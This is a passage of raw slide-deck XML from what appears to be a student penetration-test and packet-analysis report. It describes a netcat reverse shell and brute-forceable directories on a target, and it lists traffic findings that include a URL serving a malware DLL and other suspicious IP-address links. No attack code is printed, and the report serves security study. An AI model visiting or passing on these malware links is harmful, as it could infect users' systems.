              <a:t>http://www.assoc-amazon.com/s/ads.js</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-445928" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web searches for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.iphonehacks.com/jailbreak-ios-13</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="10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Watching Youtube</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="Google Shape;579;p7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57</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="Google Shape;580;p7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81" name="Google Shape;581;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1575600"/>
            <a:ext cx="20276226" cy="11141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Shopping online</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="Google Shape;588;p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58</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Google Shape;589;p7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90" name="Google Shape;590;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773400" y="1787650"/>
            <a:ext cx="22990876" cy="10551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Installing desktop wallpapers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Google Shape;597;p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59</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Google Shape;598;p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99" name="Google Shape;599;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979825" y="1683725"/>
            <a:ext cx="19464426" cy="1153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150" name="Google Shape;150;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151" name="Google Shape;151;p2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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Our assessment uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>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52" name="Google Shape;152;p23"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1311638" y="3243050"/>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Brute -forceable URL directories and files</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3100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This vulnerability allows for brute force guessing of which directories a system has.</a:t>
                      </a:r>
                      <a:endParaRPr sz="3100">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>By discovering the directories of a system, this gives away the structure of the system. </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Netcat reverse shell/remote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execution vulnerability</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/CVE-2004-1317</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Combining a bash script, a netcat</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listener, and the web browser</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access of the system,</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implementing a reverse shell was</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possible.</a:t>
                      </a:r>
                      <a:endParaRPr sz="3100">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The reverse shell gave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unauthorized remote access to the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system.</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Unrestricted access to wordpress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Once on the system there was no restricted access to the files or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This completely exposed the system and all of its directories and files to anyone who happened to gain authorized or unauthorized access.</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DHCP Request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="606" name="Google Shape;606;p7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60</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="Google Shape;607;p7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608" name="Google Shape;608;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1575600"/>
            <a:ext cx="22246124" cy="4418400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="609" name="Google Shape;609;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6146400"/>
            <a:ext cx="22246124" cy="590873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Downloading files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Google Shape;616;p7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
        <p:nvSpPr>
          <p:cNvPr id="617" name="Google Shape;617;p7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618" name="Google Shape;618;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1575600"/>
            <a:ext cx="21625251" cy="1106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Application Download -Interesting File</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Google Shape;625;p7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26" name="Google Shape;626;p7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62</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Google Shape;627;p7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28" name="Google Shape;628;p79"/>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13716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29" name="Google Shape;629;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3024000" y="1585701"/>
            <a:ext cx="16929000" cy="11915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Post Request Method - Interesting Traffic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Google Shape;636;p80"/>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1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A POST request method using secure HTTP connection</a:t>
            </a:r>
            <a:endParaRPr sz="112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37" name="Google Shape;637;p8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63</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="638" name="Google Shape;638;p80"/>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39" name="Google Shape;639;p80"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478" y="3424675"/>
            <a:ext cx="7478400" cy="9659100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="77500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-356552" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What kind of traffic did you observe? Which protocol(s)?</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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warning indicates an Unencrypted HTTP protocol detected over encrypted port, could indicate a dangerous configuration.</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POST request is using a secure HTTP protocol TCP Port 443.</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There are multiple traffic found on the same request. </a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-356552" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What, specifically, was the user doing? Which site were they browsing? Etc.</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-356552" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://31.7.62.214/fakeurl.htm</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="640" name="Google Shape;640;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6692696" y="2927900"/>
            <a:ext cx="15902353" cy="10183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1"/>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46" name="Google Shape;646;p8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64</a:t>
            </a:fld>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53" name="Google Shape;653;p82"/>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3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr sz="136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54" name="Google Shape;654;p8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65</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655" name="Google Shape;655;p82"/>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56" name="Google Shape;656;p82"/>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457200" lvl="0" indent="-463550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What kind of traffic did you observe? Which protocol(s)?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-463550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We observed a user downloading jpeg images from torrent domain via HTTP port 80.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-463550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What, specifically, was the user doing? Which site were they browsing? Etc.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-463550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://publicdomaintorrents.info/grabs/bettybooprythmonthereservationgrab.jpg</a:t>
            </a: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57" name="Google Shape;657;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16123100" y="6395163"/>
            <a:ext cx="7658100" cy="6943725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="658" name="Google Shape;658;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="446975" y="6395175"/>
            <a:ext cx="15415575" cy="67159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65" name="Google Shape;665;p8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66" name="Google Shape;666;p8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66</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667" name="Google Shape;667;p8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68" name="Google Shape;668;p8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69" name="Google Shape;669;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="358550" y="1685925"/>
            <a:ext cx="19756452" cy="8059500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="670" name="Google Shape;670;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12780613" y="4267200"/>
            <a:ext cx="11325225" cy="944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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="677" name="Google Shape;677;p8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2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr sz="124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78" name="Google Shape;678;p8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67</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="679" name="Google Shape;679;p8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80" name="Google Shape;680;p84"/>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fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-412115" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What kind of traffic did you observe? Which protocol(s)?</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-412115" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We observed the user Matthijs.devries downloaded a malware file june11.dll file on HTTP port 80.</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-412115" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What, specifically, was the user doing? Which site were they browsing? Etc.</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-412115" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://205.185.125.104/files/june11.dll</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4572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81" name="Google Shape;681;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8738350" y="1423200"/>
            <a:ext cx="15528850" cy="11530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 -Trojan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="Google Shape;688;p8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89" name="Google Shape;689;p8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68</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="Google Shape;690;p8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91" name="Google Shape;691;p85"/>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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4572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92" name="Google Shape;692;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017800" y="1802600"/>
            <a:ext cx="16330710" cy="11286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Closing Remarks</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
